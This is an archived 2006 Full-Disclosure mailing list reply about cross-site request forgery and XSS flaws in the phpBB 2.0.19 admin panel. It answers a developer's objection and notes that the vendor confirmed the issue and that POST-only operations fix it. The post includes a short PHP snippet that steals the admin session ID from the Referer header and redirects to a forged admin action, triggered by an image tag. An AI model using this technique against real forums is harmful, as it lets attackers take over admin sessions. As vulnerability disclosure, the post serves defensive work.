lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri Feb 3 14:29:13 2006 From: max at jestsuper.pl (Maksymilian Arciemowicz) Subject: phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin > From: Berliner <berliner.does.not.mean.jelly.donut_at_googlemail.com> > 1. Basically all phpBB admin-side options do allow full HTML, including > javascript. That is the intended behaviour, as there are legitimate uses. > > phpBB does however check the Session ID before allowing the changes to go to > the database. > Your exploit needs a valid admin session key and you need to get the admin > to visit the page (unless you happen to have a lot of luck with your IP)- be > it by a link or a reflecting page. And even then, it will only work, when > the admin has logged into the ACP prior to running into the trap. > $sid=''; preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid); if($sid[1]!=''){ header("Location: ".$operation."&sid=".$sid[1]); if you have example <IMG SRC="http://SOME.SCRIPT.PHP"> and you send reffere... (testes in IE, Mozilla etc) that please check.. getenv('HTTP_REFERER') The phpBB team was informed about this issues and they confirmed that these vulnerabilitie exists in phpBB 2.0.19. Solusion is use POST for all operation. > 2. That is a general problem with all pages allowing of-site pictures. It > has been discussed on the list before. Most of your examples won't work with > phpBB, due to the missing Session ID in the links. -- pub 1024D/7FDF4CEE 2005-09-21 uid Maksymilian Arciemowicz (cXIb8O3) <max@...tsuper.pl> sub 2048g/AE816DB6 2005-09-21
Powered by blists - more mailing lists